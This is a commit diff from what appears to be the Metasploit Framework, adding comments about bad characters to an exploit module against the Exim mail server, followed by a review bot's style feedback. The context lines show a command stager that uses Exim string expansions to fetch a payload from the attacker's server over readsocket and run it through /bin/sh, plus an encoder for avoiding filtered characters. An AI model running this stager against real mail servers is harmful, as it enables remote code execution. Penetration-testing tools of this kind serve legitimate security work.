Add some comments about badchars

bug/bundler_fix
William Vu 2017-05-10 00:30:43 -05:00
parent ecb79f2f85
commit 8842764d95
1 changed files with 3 additions and 0 deletions


@ -75,6 +75,7 @@ class MetasploitModule < Msf::Exploit::Remote
return
end
# Since everything goes through strtolower(), we need lowercase
print_status("Generating #{cmdstager_flavor} command stager")
@cmdstager = generate_cmdstager(
'Path' => "/#{Rex::Text.rand_text_alpha_lower(8)}",
@ -99,6 +100,7 @@ class MetasploitModule < Msf::Exploit::Remote
prestager = []
# This is basically sh -c `wget` implemented using Exim string expansions
# Badchars we can't encode away: \ for \n (newline) and : outside strings
prestager << "/bin/sh -c ${reduce{get #{get_resource} http/1.0}" \
'{${run{/bin/echo}}}{${extract{-1}{$value}{${readsocket' \
"{inet:#{srvhost_addr}:#{srvport}}{$item$value$value}}}}}}"
@ -132,6 +134,7 @@ class MetasploitModule < Msf::Exploit::Remote
exim_payload << " #{Rex::Text.rand_text_alpha(8)})"
end
# We can encode away the following badchars using string expansions
def encode_exim_payload(command)
command.gsub(/[\/ :]/,
'/' => '${substr{0}{1}{$spool_directory}}',
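Review bot: The lowercase comment added above `print_status` in the first hunk sits two lines away from the code it justifies, the `'Path' => "/#{Rex::Text.rand_text_alpha_lower(8)}"` argument; moving it directly above that argument, and saying which value passes through strtolower(), would keep the reason next to the code. In the last hunk, "the following badchars" leaves the reader to decode the character class in `gsub`; a comment such as `# Encode away /, space, and : using Exim string expansions` names them outright. The mixed-case `Rex::Text.rand_text_alpha(8)` just above that comment is presumably safe from the lowercasing because it is only filler, and if so that deserves a word as well. The enclosing methods in all three hunks start or end outside the visible lines, so this is judged from the shown context only.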